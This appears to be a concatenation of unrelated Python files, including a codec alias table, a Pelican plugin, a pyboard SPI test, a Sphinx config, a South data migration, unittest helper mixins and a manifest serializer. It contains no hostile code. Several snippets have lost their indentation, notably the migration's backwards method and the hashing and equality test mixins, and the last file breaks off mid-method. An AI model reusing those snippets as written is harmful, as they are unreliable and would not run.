    'cp936' : 'gbk',
    'ms936' : 'gbk',
    ## hex_codec codec
    #'hex' : 'hex_codec',
    # hp_roman8 codec
    'roman8' : 'hp_roman8',
    'r8' : 'hp_roman8',
    'csHPRoman8' : 'hp_roman8',
    # hz codec
    'hzgb' : 'hz',
    'hz_gb' : 'hz',
    'hz_gb_2312' : 'hz',
    # iso2022_jp codec
    'csiso2022jp' : 'iso2022_jp',
    'iso2022jp' : 'iso2022_jp',
    'iso_2022_jp' : 'iso2022_jp',
    # iso2022_jp_1 codec
    'iso2022jp_1' : 'iso2022_jp_1',
    'iso_2022_jp_1' : 'iso2022_jp_1',
    # iso2022_jp_2 codec
    'iso2022jp_2' : 'iso2022_jp_2',
    'iso_2022_jp_2' : 'iso2022_jp_2',
    # iso2022_jp_2004 codec
    'iso_2022_jp_2004' : 'iso2022_jp_2004',
    'iso2022jp_2004' : 'iso2022_jp_2004',
    # iso2022_jp_3 codec
    'iso2022jp_3' : 'iso2022_jp_3',
    'iso_2022_jp_3' : 'iso2022_jp_3',
    # iso2022_jp_ext codec
    'iso2022jp_ext' : 'iso2022_jp_ext',
    'iso_2022_jp_ext' : 'iso2022_jp_ext',
    # iso2022_kr codec
    'csiso2022kr' : 'iso2022_kr',
    'iso2022kr' : 'iso2022_kr',
    'iso_2022_kr' : 'iso2022_kr',
    # iso8859_10 codec
    'csisolatin6' : 'iso8859_10',
    'iso_8859_10' : 'iso8859_10',
    'iso_8859_10_1992' : 'iso8859_10',
    'iso_ir_157' : 'iso8859_10',
    'l6' : 'iso8859_10',
    'latin6' : 'iso8859_10',
    # iso8859_11 codec
    'thai' : 'iso8859_11',
    'iso_8859_11' : 'iso8859_11',
    'iso_8859_11_2001' : 'iso8859_11',
    # iso8859_13 codec
    'iso_8859_13' : 'iso8859_13',
    'l7' : 'iso8859_13',
    'latin7' : 'iso8859_13',
    # iso8859_14 codec
    'iso_8859_14' : 'iso8859_14',
    'iso_8859_14_1998' : 'iso8859_14',
    'iso_celtic' : 'iso8859_14',
    'iso_ir_199' : 'iso8859_14',
    'l8' : 'iso8859_14',
    'latin8' : 'iso8859_14',
    # iso8859_15 codec
    'iso_8859_15' : 'iso8859_15',
    'l9' : 'iso8859_15',
    'latin9' : 'iso8859_15',
    # iso8859_16 codec
    'iso_8859_16' : 'iso8859_16',
    'iso_8859_16_2001' : 'iso8859_16',
    'iso_ir_226' : 'iso8859_16',
    'l10' : 'iso8859_16',
    'latin10' : 'iso8859_16',
    # iso8859_2 codec
    'csisolatin2' : 'iso8859_2',
    'iso_8859_2' : 'iso8859_2',
    'iso_8859_2_1987' : 'iso8859_2',
    'iso_ir_101' : 'iso8859_2',
    'l2' : 'iso8859_2',
    'latin2' : 'iso8859_2',
    # iso8859_3 codec
    'csisolatin3' : 'iso8859_3',
    'iso_8859_3' : 'iso8859_3',
    'iso_8859_3_1988' : 'iso8859_3',
    'iso_ir_109' : 'iso8859_3',
    'l3' : 'iso8859_3',
    'latin3' : 'iso8859_3',
    # iso8859_4 codec
    'csisolatin4' : 'iso8859_4',
    'iso_8859_4' : 'iso8859_4',
    'iso_8859_4_1988' : 'iso8859_4',
    'iso_ir_110' : 'iso8859_4',
    'l4' : 'iso8859_4',
    'latin4' : 'iso8859_4',
    # iso8859_5 codec
    'csisolatincyrillic' : 'iso8859_5',
    'cyrillic' : 'iso8859_5',
    'iso_8859_5' : 'iso8859_5',
    'iso_8859_5_1988' : 'iso8859_5',
    'iso_ir_144' : 'iso8859_5',
    # iso8859_6 codec
    'arabic' : 'iso8859_6',
    'asmo_708' : 'iso8859_6',
    'csisolatinarabic' : 'iso8859_6',
    'ecma_114' : 'iso8859_6',
    'iso_8859_6' : 'iso8859_6',
    'iso_8859_6_1987' : 'iso8859_6',
    'iso_ir_127' : 'iso8859_6',
    # iso8859_7 codec
    'csisolatingreek' : 'iso8859_7',
    'ecma_118' : 'iso8859_7',
    'elot_928' : 'iso8859_7',
    'greek' : 'iso8859_7',
    'greek8' : 'iso8859_7',
    'iso_8859_7' : 'iso8859_7',
    'iso_8859_7_1987' : 'iso8859_7',
    'iso_ir_126' : 'iso8859_7',
    # iso8859_8 codec
    'csisolatinhebrew' : 'iso8859_8',
    'hebrew' : 'iso8859_8',
    'iso_8859_8' : 'iso8859_8',
    'iso_8859_8_1988' : 'iso8859_8',
    'iso_ir_138' : 'iso8859_8',
    # iso8859_9 codec
    'csisolatin5' : 'iso8859_9',
    'iso_8859_9' : 'iso8859_9',
    'iso_8859_9_1989' : 'iso8859_9',
    'iso_ir_148' : 'iso8859_9',
    'l5' : 'iso8859_9',
    'latin5' : 'iso8859_9',
    # johab codec
    'cp1361' : 'johab',
    'ms1361' : 'johab',
    # koi8_r codec
    'cskoi8r' : 'koi8_r',
    # latin_1 codec
    #
    # Note that the latin_1 codec is implemented internally in C and a
    # lot faster than the charmap codec iso8859_1 which uses the same
    # encoding. This is why we discourage the use of the iso8859_1
    # codec and alias it to latin_1 instead.
    #
    '8859' : 'latin_1',
    'cp819' : 'latin_1',
    'csisolatin1' : 'latin_1',
    'ibm819' : 'latin_1',
    'iso8859' : 'latin_1',
    'iso8859_1' : 'latin_1',
    'iso_8859_1' : 'latin_1',
    'iso_8859_1_1987' : 'latin_1',
    'iso_ir_100' : 'latin_1',
    'l1' : 'latin_1',
    'latin' : 'latin_1',
    'latin1' : 'latin_1',
    # mac_cyrillic codec
    'maccyrillic' : 'mac_cyrillic',
    # mac_greek codec
    'macgreek' : 'mac_greek',
    # mac_iceland codec
    'maciceland' : 'mac_iceland',
    # mac_latin2 codec
    'maccentraleurope' : 'mac_latin2',
    'maclatin2' : 'mac_latin2',
    # mac_roman codec
    'macintosh' : 'mac_roman',
    'macroman' : 'mac_roman',
    # mac_turkish codec
    'macturkish' : 'mac_turkish',
    # mbcs codec
    # NOTE(review): mbcs is only available on Windows builds — confirm before
    # relying on this alias on other platforms.
    'dbcs' : 'mbcs',
    # ptcp154 codec
    'csptcp154' : 'ptcp154',
    'pt154' : 'ptcp154',
    'cp154' : 'ptcp154',
    'cyrillic_asian' : 'ptcp154',
    ## quopri_codec codec
    #'quopri' : 'quopri_codec',
    #'quoted_printable' : 'quopri_codec',
    #'quotedprintable' : 'quopri_codec',
    ## rot_13 codec
    #'rot13' : 'rot_13',
    # shift_jis codec
    'csshiftjis' : 'shift_jis',
    'shiftjis' : 'shift_jis',
    'sjis' : 'shift_jis',
    's_jis' : 'shift_jis',
    # shift_jis_2004 codec
    'shiftjis2004' : 'shift_jis_2004',
    'sjis_2004' : 'shift_jis_2004',
    's_jis_2004' : 'shift_jis_2004',
    # shift_jisx0213 codec
    'shiftjisx0213' : 'shift_jisx0213',
    'sjisx0213' : 'shift_jisx0213',
    's_jisx0213' : 'shift_jisx0213',
    # tactis codec
    # NOTE(review): no "tactis" codec module ships with CPython — verify this
    # alias resolves in this distribution before relying on it.
    'tis260' : 'tactis',
    # tis_620 codec
    'tis620' : 'tis_620',
    'tis_620_0' : 'tis_620',
    'tis_620_2529_0' : 'tis_620',
    'tis_620_2529_1' : 'tis_620',
    'iso_ir_166' : 'tis_620',
    # utf_16 codec
    'u16' : 'utf_16',
    'utf16' : 'utf_16',
    # utf_16_be codec
    'unicodebigunmarked' : 'utf_16_be',
    'utf_16be' : 'utf_16_be',
    # utf_16_le codec
    'unicodelittleunmarked' : 'utf_16_le',
    'utf_16le' : 'utf_16_le',
    # utf_32 codec
    'u32' : 'utf_32',
    'utf32' : 'utf_32',
    # utf_32_be codec
    'utf_32be' : 'utf_32_be',
    # utf_32_le codec
    'utf_32le' : 'utf_32_le',
    # utf_7 codec
    'u7' : 'utf_7',
    'utf7' : 'utf_7',
    'unicode_1_1_utf_7' : 'utf_7',
    # utf_8 codec
    'u8' : 'utf_8',
    'utf' : 'utf_8',
    'utf8' : 'utf_8',
    'utf8_ucs2' : 'utf_8',
    'utf8_ucs4' : 'utf_8',
    ## uu_codec codec
    #'uu' : 'uu_codec',
    ## zlib_codec codec
    #'zip' : 'zlib_codec',
    #'zlib' : 'zlib_codec',
    # temporary mac CJK aliases, will be replaced by proper codecs in 3.1
    'x_mac_japanese' : 'shift_jis',
    'x_mac_korean' : 'euc_kr',
    'x_mac_simp_chinese' : 'gb2312',
    'x_mac_trad_chinese' : 'big5',
}
|
class A:
    """Empty placeholder class (no attributes or behavior)."""
    pass
class B:
    """Empty placeholder class (no attributes or behavior)."""
    pass
|
"""
Dateish Plugin for Pelican
==========================
This plugin adds the ability to treat arbitrary metadata fields as datetime
objects.
"""
from pelican import signals
from pelican.utils import get_date
def dateish(generator):
    """Convert configured article metadata fields to datetime objects.

    Reads the field names from the DATEISH_PROPERTIES setting; for each
    article that has such a field, parses its value (or each element of a
    list value) with pelican's get_date. No-op when the setting is absent.
    """
    if 'DATEISH_PROPERTIES' not in generator.settings:
        return
    for article in generator.articles:
        for field in generator.settings['DATEISH_PROPERTIES']:
            if hasattr(article, field):
                value = getattr(article, field)
                # BUGFIX: isinstance instead of `type(value) == list`, so
                # list subclasses are converted element-wise too.
                if isinstance(value, list):
                    setattr(article, field, [get_date(d) for d in value])
                else:
                    setattr(article, field, get_date(value))
def register():
    # Pelican plugin entry point: run dateish after articles are generated.
    signals.article_generator_finalized.connect(dateish)
|
from pyb import SPI
# Hardware test for pyboard SPI: invalid bus ids must raise ValueError,
# valid ones construct successfully.
for bus in (-1, 0, 1, 2, 3, "X", "Y", "Z"):
    try:
        SPI(bus)
        print("SPI", bus)
    except ValueError:
        print("ValueError", bus)
# Exercise the various constructor signatures and check repr output.
spi = SPI(1)
print(spi)
spi = SPI(1, SPI.MASTER)
spi = SPI(1, SPI.MASTER, baudrate=500000)
spi = SPI(1, SPI.MASTER, 500000, polarity=1, phase=0, bits=8, firstbit=SPI.MSB, ti=False, crc=None)
print(spi)
# Re-initialise as slave; with no master driving the bus, recv must time out.
spi.init(SPI.SLAVE, phase=1)
print(spi)
try:
    # need to flush input before we get an error (error is what we want to test)
    for i in range(10):
        spi.recv(1, timeout=100)
except OSError:
    print("OSError")
# Back to master mode: loopback-style send/recv/send_recv smoke tests.
spi.init(SPI.MASTER)
spi.send(1, timeout=100)
print(spi.recv(1, timeout=100))
print(spi.send_recv(1, timeout=100))
|
import sys, os

# Sphinx configuration for the ns-3 model library documentation.
# NOTE(review): sphinx.ext.pngmath is deprecated in newer Sphinx releases
# (replaced by imgmath) — confirm against the Sphinx version in use.
extensions = ['sphinx.ext.pngmath']
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'ns-3'
copyright = u'2011, ns-3 project'
version = 'ns-3-dev'
release = 'ns-3-dev'
exclude_patterns = []
pygments_style = 'sphinx'
# HTML output: custom ns-3 theme located two directories up.
html_theme = 'ns3_html_theme'
html_theme_path = ['../..']
html_title = 'Model Library'
html_short_title = 'Models'
html_static_path = ['_static']
html_last_updated_fmt = '%b %d, %Y %H:%M'
htmlhelp_basename = 'ns-3doc'
# LaTeX (PDF) output.
latex_documents = [
    ('index', 'ns-3-model-library.tex', u'ns-3 Model Library',
     u'ns-3 project', 'manual'),
]
latex_logo = '../../ns3_html_theme/static/ns-3.png'
# Man page output.
man_pages = [
    ('index', 'ns-3-model-library', u'ns-3 Model Library',
     [u'ns-3 project'], 1)
]
|
"""Django Unit Test framework."""
from django.test.client import Client, RequestFactory
from django.test.testcases import (
LiveServerTestCase, SimpleTestCase, TestCase, TransactionTestCase,
skipIfDBFeature, skipUnlessAnyDBFeature, skipUnlessDBFeature,
)
from django.test.utils import (
ignore_warnings, modify_settings, override_settings,
override_system_checks, tag,
)
# Public API of the django.test package.
__all__ = [
    'Client', 'RequestFactory', 'TestCase', 'TransactionTestCase',
    'SimpleTestCase', 'LiveServerTestCase', 'skipIfDBFeature',
    'skipUnlessAnyDBFeature', 'skipUnlessDBFeature', 'ignore_warnings',
    'modify_settings', 'override_settings', 'override_system_checks', 'tag',
]
|
import bench
def func(a, b, c):
    # Intentionally empty: the benchmark measures pure call overhead.
    pass
def test(num):
    # Benchmark body: `iter()` wrapper and the 3-argument call are the
    # operations under measurement — do not "simplify" them away.
    for i in iter(range(num)):
        func(i, i, i)
bench.run(test)
|
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models, IntegrityError
class Migration(DataMigration):
    def forwards(self, orm):
        """Map all Finance Admins to Sales Admins."""
        # Create a parallel sales_admin role row for every finance_admin,
        # preserving user/org/course; existing rows are left untouched.
        finance_admins = orm['student.courseaccessrole'].objects.filter(role='finance_admin')
        for finance_admin in finance_admins:
            sales_admin = orm['student.courseaccessrole'](
                role='sales_admin',
                user=finance_admin.user,
                org=finance_admin.org,
                course_id=finance_admin.course_id,
            )
            try:
                sales_admin.save()
            except IntegrityError:
                pass # If sales admin roles exist, continue.
def backwards(self, orm):
"""Remove all sales administrators, as they did not exist before this migration. """
sales_admins = orm['student.courseaccessrole'].objects.filter(role='sales_admin')
sales_admins.delete()
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'student.anonymoususerid': {
'Meta': {'object_name': 'AnonymousUserId'},
'anonymous_user_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseaccessrole': {
'Meta': {'unique_together': "(('user', 'org', 'course_id', 'role'),)", 'object_name': 'CourseAccessRole'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'org': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '64', 'blank': 'True'}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseenrollmentallowed': {
'Meta': {'unique_together': "(('email', 'course_id'),)", 'object_name': 'CourseEnrollmentAllowed'},
'auto_enroll': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'student.dashboardconfiguration': {
'Meta': {'object_name': 'DashboardConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'recent_enrollment_time_delta': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'student.loginfailures': {
'Meta': {'object_name': 'LoginFailures'},
'failure_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lockout_until': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.passwordhistory': {
'Meta': {'object_name': 'PasswordHistory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'time_set': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.pendingemailchange': {
'Meta': {'object_name': 'PendingEmailChange'},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_email': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.pendingnamechange': {
'Meta': {'object_name': 'PendingNameChange'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'rationale': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.registration': {
'Meta': {'object_name': 'Registration', 'db_table': "'auth_registration'"},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.userprofile': {
'Meta': {'object_name': 'UserProfile', 'db_table': "'auth_userprofile'"},
'allow_certificate': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'city': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'courseware': ('django.db.models.fields.CharField', [], {'default': "'course.xml'", 'max_length': '255', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
'goals': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'level_of_education': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'mailing_address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"}),
'year_of_birth': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'})
},
'student.usersignupsource': {
'Meta': {'object_name': 'UserSignupSource'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.userstanding': {
'Meta': {'object_name': 'UserStanding'},
'account_status': ('django.db.models.fields.CharField', [], {'max_length': '31', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'standing_last_changed_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'standing'", 'unique': 'True', 'to': "orm['auth.User']"})
},
'student.usertestgroup': {
'Meta': {'object_name': 'UserTestGroup'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'db_index': 'True', 'symmetrical': 'False'})
}
}
complete_apps = ['student']
symmetrical = True
|
import unittest
class TestHashing(object):
"""Used as a mixin for TestCase"""
# Check for a valid __hash__ implementation
def test_hash(self):
for obj_1, obj_2 in self.eq_pairs:
try:
if not hash(obj_1) == hash(obj_2):
self.fail("%r and %r do not hash equal" % (obj_1, obj_2))
except KeyboardInterrupt:
raise
except Exception, e:
self.fail("Problem hashing %r and %r: %s" % (obj_1, obj_2, e))
for obj_1, obj_2 in self.ne_pairs:
try:
if hash(obj_1) == hash(obj_2):
self.fail("%s and %s hash equal, but shouldn't" %
(obj_1, obj_2))
except KeyboardInterrupt:
raise
except Exception, e:
self.fail("Problem hashing %s and %s: %s" % (obj_1, obj_2, e))
class TestEquality(object):
"""Used as a mixin for TestCase"""
# Check for a valid __eq__ implementation
def test_eq(self):
for obj_1, obj_2 in self.eq_pairs:
self.assertEqual(obj_1, obj_2)
self.assertEqual(obj_2, obj_1)
# Check for a valid __ne__ implementation
def test_ne(self):
for obj_1, obj_2 in self.ne_pairs:
self.assertNotEqual(obj_1, obj_2)
self.assertNotEqual(obj_2, obj_1)
class LoggingResult(unittest.TestResult):
    """TestResult that appends the name of every result callback to a log list."""
    def __init__(self, log):
        # The caller keeps a reference to *log* and inspects it afterwards.
        self._events = log
        super(LoggingResult, self).__init__()
    def _record(self, event_name):
        # Single point of logging shared by all the overrides below.
        self._events.append(event_name)
    def startTest(self, test):
        self._record('startTest')
        super(LoggingResult, self).startTest(test)
    def startTestRun(self):
        self._record('startTestRun')
        super(LoggingResult, self).startTestRun()
    def stopTest(self, test):
        self._record('stopTest')
        super(LoggingResult, self).stopTest(test)
    def stopTestRun(self):
        self._record('stopTestRun')
        super(LoggingResult, self).stopTestRun()
    def addFailure(self, *args):
        self._record('addFailure')
        super(LoggingResult, self).addFailure(*args)
    def addSuccess(self, *args):
        self._record('addSuccess')
        super(LoggingResult, self).addSuccess(*args)
    def addError(self, *args):
        self._record('addError')
        super(LoggingResult, self).addError(*args)
    def addSkip(self, *args):
        self._record('addSkip')
        super(LoggingResult, self).addSkip(*args)
    def addExpectedFailure(self, *args):
        self._record('addExpectedFailure')
        super(LoggingResult, self).addExpectedFailure(*args)
    def addUnexpectedSuccess(self, *args):
        self._record('addUnexpectedSuccess')
        super(LoggingResult, self).addUnexpectedSuccess(*args)
class ResultWithNoStartTestRunStopTestRun(object):
    """An object honouring TestResult before startTestRun/stopTestRun."""
    def __init__(self):
        # Mirror the attributes unittest.TestResult exposes, without the
        # startTestRun/stopTestRun hooks added in later Python versions.
        self.failures = []
        self.errors = []
        self.skipped = []
        self.expectedFailures = []
        self.unexpectedSuccesses = []
        self.testsRun = 0
        self.shouldStop = False
    # The per-test callbacks are deliberate no-ops.
    def startTest(self, test):
        pass
    def stopTest(self, test):
        pass
    def addError(self, test):
        pass
    def addFailure(self, test):
        pass
    def addSuccess(self, test):
        pass
    def wasSuccessful(self):
        # Nothing is ever recorded, so the run is always "successful".
        return True
|
# NOTE(review): used elsewhere in this module; exact purpose (e.g. an OpenID
# association handle length) is not visible here -- confirm before relying on it.
KEY_LENGTH = 16
# Simple Registration (sreg) attribute names mapped to their Attribute
# Exchange (AX) type URIs.
SREG2AX = {  # from http://www.axschema.org/types/#sreg
    'nickname': 'http://axschema.org/namePerson/friendly',
    'email': 'http://axschema.org/contact/email',
    'fullname': 'http://axschema.org/namePerson',
    'dob': 'http://axschema.org/birthDate',
    'gender': 'http://axschema.org/person/gender',
    'postcode': 'http://axschema.org/contact/postalCode/home',
    'country': 'http://axschema.org/contact/country/home',
    'language': 'http://axschema.org/pref/language',
    'timezone': 'http://axschema.org/pref/timezone',
}
|
from node import NodeVisitor, ValueNode, ListNode, BinaryExpressionNode
from parser import atoms, precedence
# Reverse lookup: atom value -> "@name" manifest syntax.
# NOTE: iteritems() makes this module Python-2-only.
atom_names = {v:"@%s" % k for (k,v) in atoms.iteritems()}
# Control characters that have single-letter backslash escapes.
named_escapes = set(["\a", "\b", "\f", "\n", "\r", "\t", "\v"])
def escape(string, extras=""):
    """Backslash-escape *string* for manifest output.

    Characters with named escapes are emitted via the unicode_escape codec,
    backslashes are doubled, other control characters (< 0x20) become
    ``\\xNN``, and any character listed in *extras* gets a leading backslash.
    Returns the result encoded as UTF-8 (Python 2 byte-string semantics --
    this module uses Py2-only idioms such as iteritems()).
    """
    rv = ""
    for c in string:
        if c in named_escapes:
            # e.g. "\n" -> the two characters "\" "n".
            rv += c.encode("unicode_escape")
        elif c == "\\":
            rv += "\\\\"
        elif c < '\x20':
            # Remaining control characters as hex escapes.
            rv += "\\x%02x" % ord(c)
        elif c in extras:
            rv += "\\" + c
        else:
            rv += c
    return rv.encode("utf8")
class ManifestSerializer(NodeVisitor):
    """Render a parsed manifest AST back into manifest text.

    Each visit_* method returns a list of output lines (or line fragments)
    for its node type; serialize() joins the root's lines into a string.
    """
    def __init__(self, skip_empty_data=False):
        # When True, data sections without children are omitted entirely.
        self.skip_empty_data = skip_empty_data
    def serialize(self, root):
        # Fixed two-space indent for nested keys and section children.
        self.indent = 2
        rv = "\n".join(self.visit(root))
        # Ensure exactly one trailing newline.
        # NOTE(review): rv[-1] raises IndexError when the tree serializes to
        # "" -- presumably the root always produces output; confirm.
        if rv[-1] != "\n":
            rv = rv + "\n"
        return rv
    def visit_DataNode(self, node):
        rv = []
        if not self.skip_empty_data or node.children:
            if node.data:
                # Section heading; "]" must be escaped inside the brackets.
                rv.append("[%s]" % escape(node.data, extras="]"))
                indent = self.indent * " "
            else:
                indent = ""
            for child in node.children:
                # Indent child lines; blank lines stay unindented.
                rv.extend("%s%s" % (indent if item else "", item) for item in self.visit(child))
            if node.parent:
                # Blank separator line between sibling sections.
                rv.append("")
        return rv
    def visit_KeyValueNode(self, node):
        rv = [escape(node.data, ":") + ":"]
        indent = " " * self.indent
        if len(node.children) == 1 and isinstance(node.children[0], (ValueNode, ListNode)):
            # A single simple value shares the key's line.
            rv[0] += " %s" % self.visit(node.children[0])[0]
        else:
            # Conditional branches each get their own indented line.
            for child in node.children:
                rv.append(indent + self.visit(child)[0])
        return rv
    def visit_ListNode(self, node):
        rv = ["["]
        # NOTE(review): extend() over a string appends its characters one by
        # one; the final "".join makes the output identical to append().
        rv.extend(", ".join(self.visit(child)[0] for child in node.children))
        rv.append("]")
        return ["".join(rv)]
    def visit_ValueNode(self, node):
        # Quote values that would be ambiguous: "#" starts a comment, and
        # "," / "]" are delimiters inside list context.
        if "#" in node.data or (isinstance(node.parent, ListNode) and
                                ("," in node.data or "]" in node.data)):
            if "\"" in node.data:
                quote = "'"
            else:
                quote = "\""
        else:
            quote = ""
        return [quote + escape(node.data, extras=quote) + quote]
    def visit_AtomNode(self, node):
        # Atoms print with their "@name" spelling.
